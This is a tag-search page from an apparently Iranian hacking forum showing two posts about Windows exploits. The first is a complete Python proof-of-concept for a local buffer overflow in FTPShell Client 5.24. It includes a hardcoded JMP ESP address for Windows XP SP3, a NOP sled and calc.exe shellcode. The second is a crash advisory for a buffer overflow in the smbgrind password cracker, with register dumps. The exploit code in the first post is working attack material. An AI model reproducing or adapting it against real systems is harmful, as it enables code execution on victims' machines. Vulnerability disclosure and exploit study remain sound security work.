رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'اکسپلویت ویندوز'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

  1. #[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] #[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow #[+] Date: 2/2/2016 #[+]Exploit Author: Arash Khazaei #[+] Version: 5.24 #[+] Tested on: Windows XP Professional SP3 (Version 2002) #[+] CVE : N/A #[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content #[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ... #[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] #!/usr/bin/python filename = "buffer.txt" # Junk A junk = "A"*452 #77FAB277 JMP ESP # Windows Xp Professional Version 2002 Service Pack 3 eip = "\x77\xB2\xFA\x77" # Nops nops = "\x90"*100 # Shellcode Calc.exe 16Byte buf=("\x31\xC9" "\x51" "\x68\x63\x61\x6C\x63" "\x54" "\xB8\xC7\x93\xC2\x77" "\xFF\xD0") #Appending Buffers Together exploit = junk + eip + nops + buf #Creating File length = len(exploit) print "[+]File name: [%s]\n" % filename print "[+]Payload Size: [%s]\n " % length print "[+]File Created.\n" file = open(filename,"w") file.write(exploit) file.close print exploit
  2. [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org Vendor: ======================= Network Associates Inc. Product: =========================================== smbgrind: NetBIOS parallel password grinder circa 1996-1999 smbgrind.exe is a component of CyberCop Scanner v5.5. It is intended to remotely crack SMB usernames and passwords, used to establish a login session to the remote NetBIOS file server. Cybercop was discontinued back in 2002. usage: smbgrind -i <address> [options] -r Remote NetBIOS name of destination host -i IP address of destination host -u Name of userlist file (default NTuserlist.txt) -p Name of password list file (default NTpasslist.txt) -l Number of simultaneous connections (max: 50 default: 10) -v Provide verbose output on progress Vulnerability Type: =================== Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ====================== Smbgrind.exe succumbs to buffer overflow when supplied a large number of bytes (1206) for the -r switch for the remote NetBios name of destination host. Resulting in memory corruption overwriting several registers... GDB dump... Program received signal SIGSEGV, Segmentation fault. 0x0040c421 in ?? () (gdb) info r eax 0x3 3 ecx 0x41414141 1094795585 edx 0x41414141 1094795585 ebx 0x41414141 1094795585 esp 0x241e89c 0x241e89c ebp 0x241e8a8 0x241e8a8 esi 0x401408 4199432 edi 0x41414141 1094795585 eip 0x40c421 0x40c421 eflags 0x10283 [ CF SF IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x53 83 gs 0x2b 43 (gdb) smbgrind core dump file... (C:\smbgrind.exe 1000) exception C0000005 at 40C421 (C:\smbgrind.exe 1000) exception: ax 2 bx 41414141 cx 41414141 dx 41414141 (C:\smbgrind.exe 1000) exception: si 401408 di 41414141 bp 241F39C sp 241F390 (C:\smbgrind.exe 1000) exception is: STATUS_ACCESS_VIOLATION [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. hyp3rlinx
×
×
  • ایجاد مورد جدید...